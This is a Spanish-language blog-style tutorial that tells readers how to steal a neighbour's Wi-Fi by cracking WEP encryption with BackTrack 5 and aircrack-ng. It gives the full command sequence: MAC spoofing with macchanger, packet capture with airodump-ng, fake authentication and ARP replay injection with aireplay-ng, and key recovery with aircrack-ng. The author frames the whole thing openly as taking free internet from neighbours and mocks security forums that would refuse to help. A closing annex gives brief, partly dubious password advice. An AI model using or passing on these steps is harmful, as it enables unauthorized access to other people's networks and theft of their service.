Hace un par de meses me mude y se presento un dilema: sin plata para pagar Internet, como conectarse? Gracias a las maravillas arquitectónicas de Capital Federal (Lease vivir todos apretados), pude notar que habia muchas conexiones alrededor. Buscando, averigue que las redes WEP son particularmente vulnerables.

Voy a explicar para que cualquier hijo de vecino, cosas que son bastante complicadas si se las pretende entender en profundidad. Así que si sos como yo un NO administrador de redes, te recomiendo que simplemente sigas los pasos.

A tener en cuenta:

1. Tenes que estar cerca de la red. Mientras mas cerca, mejor. Si captas solo una linea, o digamos menos del 50% de fuerza de la red, va a ser una tarea venenosa.
2. Tienen que ser redes con seguridad WEP. Si bien las redes WPA y WPA2 son crackeables, es un dolor de huevo y no creo que valga la pena.
3. Necesitan una placa de red inalambrica, obviamente.

Primer paso: Backtrack 5
Lo primero que tienen que hacer es conseguir backtrack 5. Los buscan con Google o algún buscador de Torrents, no van a tener problemas para encontrarlo. Backtrack es simplemente una distribución de Linux que tiene todo lo necesario para nuestro trabajito.
Una vez que descargan esto (es un archivo iso), lo queman en un DVD. Reinician la maquina y bootean desde el DVD.
Aca van a llegar a una especie de menu, donde hay varias opciones.
Crackear redes WEP (sin saber nada)

Eligen la primera, pasan un montón de letras tipo DOS hasta que llega a un alto. En este momento escriben "startx" y le dan Enter.
Luego de un par de letras mas, inicia el sistema que se ve igual que un linux.


Hackear



Empezando con el trabajo:
Una vez que inicio y esta todo lindo, abrimos una consola. (para los que ni siquiera saben que es esto, busquen en google "consola linux".
Dentro de esta consola escribimos nuestro primer comando:
airmon-ng
Este comando nos va a mostrar nuestros dispositivos de red inalambricos. Generalmente se llaman "wlan0" o "wlan1", algo asi.
Nos fijamos como se llama nuestro dispositivo y a continuacion escribimos:
airmon-ng stop (nombre de dispositivo)

ifconfig (nombre de dispositivo) down

macchanger --m 00:11:22:33:44:55 (nombre de dispositivo)

airmon-ng start (nombre de dispositivo)

EJEMPLO:
Si tu tarjeta de red se llama wlan0, entonces los comandos serían:

airmon-ng stop wlan0
ifconfig wlan0 down
macchanger – -mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan0


contraseña

Una vez que hicieron esto con exito, pasamos al siguiente paso; escribimos:

airodump-ng (tarjeta de red)

Una vez que apretan enter a este codigo, van a empezar a aparecer las redes que tu tarjeta ve. La lista es interminable porque continuamente actualiza, asi que para frenarlo apreta "CTRL + C"

redes

Aca vemos que aspecto tiene esta lista.
Obviamente, ustedes sabran que red agarran con mas fuerza, asi que elijan esa, siempre y cuando tenga seguridad WEP.

A continuacion escribimos:

airodump-ng -c (canal) -w (nombre del archivo) --bssid (bssid) (nombre del dispositivo)

(canal) = Canal que use la red que elegimos.
(nombre de archivo) = nombre del archivo en donde guardamos info. Ponganle algo que se acuerden porque lo van a usar mas adelante.
(bssid) = BSSID de la red que eligieron.

Esta linea la completamos con la red que ustedes eligieron. Entonces quedaría (siguiendo el ejemplo de la foto):
airodump-ng -c 3 -w yoyo – -bssid 00:23:69:BB:2D:0F wlan0

Le damos enter y ahora ya estas capturando datos. Fíjate que hay una columna que dice DATA, estos son los paquetes que llevas capturados, para poder descifrar la clave WEP como mínimo deves capturar unos 20,000 paquetes.

Inyectando trafico a la red:
Para acelerar un poco las cosas y que la columna de DATA se llene rapido, vamos a inyectar paquetes a la red.
Abrimos otra consola y escribimos:

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 (nombre del dispositivo)

(bssid) = BSSID de la red que elegimos.
-h = Nuestra mac. Acuerdense que al principio la cambiamos a 00:11:22:33:44:55
(nombre del dispositivo) = nuestra tarjeta de red (wlan0, wlan1 o lo que sea)

Siguiendo el ejemplo de la foto, este comando quedaria asi:
aireplay-ng -1 0 -a 00:23:69:BB:2D:0F -h 00:11:22:33:44:55 wlan0

Después de introducir el comando deberían aparecer 4 lineas de codigos y la final debe decir que la conexion ha sido exitosa (“Association successful”).
Si por alguna razón no te puedse conectar, entonces las causas pueden ser las siguientes:

-La red que quieres atacar esta muy lejos.
-Tu tarjeta de red no puede hacer inyeccion de paquetes.
-El router que quieres atacar tiene seguridad para evitar este tipo de ataques.

Wifi


Entonces, una ves que tuvimos el "association successful", insertamos un nuevo comando:
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (tarjeta de red)

Siguiendo el ejemplo de las fotos nos quedaria asi:

aireplay-ng -3 -b 00:23:69:BB:2D:0F -h 00:11:22:33:44:55 wlan0

Dependiendo de la potencia de la red que estés atacando este proceso podría tomar algún tiempo. Deja la PC haciendo eso y volve cuando tengas 20.000 paquetes en la columna DATA

Terminando:
Una ves que llegues a los 20.000 paquetes en la columna DATA, abri una nueva consola y escribi:
aircrack-ng-b (bssid) (nombre de archivo-01.cap)

Automaticamente te agrega al final del nombre de archivo que elegimos anteriormente -01, -02 o lo que fuere.

Siguiendo el ejemplo de las foto nos queda asi:
aircrack-ng-b 00:23:69:BB:2D:0F yoyo-01.cap)


Si los datos fueron suficientes, trabaja un par de segundos y te tira la clave.
Si los datos no fueron suficientes, te avisa que va a volver intentar cuando tenga mas paquetes. No toques nada y volve al rato.

IMPORTANTE: A veces te tira la clave en hexadecimal. Anotala venga como venga, que windows te acepta que la escribas en hexadecimal.




Espero que hayan entendido, es facil por mas que parece complicado. Tomense el tiempo para entender bien que es lo que tienen que reemplazar en cada comando, no copien simplemente lo que puse porque tienen que adaptarlo obviamente a su entorno.
Este es el metodo mas basico; hay redes que se van a poner putas y no va a funcionar. Si investigan en internet, van a encontrar las respuestas para cagar a cualquier red.
Y hagan lo que hagan, no vayan a pedir ayuda a ningun foro especializado, porque esa gente estudia la seguridad con fines educativos, no para cagarle el Wi Fi a los vecinos. Asi que te van a putear y/o ignorar.


Saludos.!


ANEXO:
Por cierto, si tenes internet y lo pagas, obvio que no vas a querer que te lo usen:
1- Usa encriptacion WPA o WPA2
2- No pongas contraseñas fantasiosa (por ejemplo 15 digitos numericos) porque son fáciles. Pone combinaciones del tipo "carlitos1482casa".
Para crackear redes WPA/WPA2 se usan diccionarios de palabras, y ningun diccionario tiene tales combinaciones.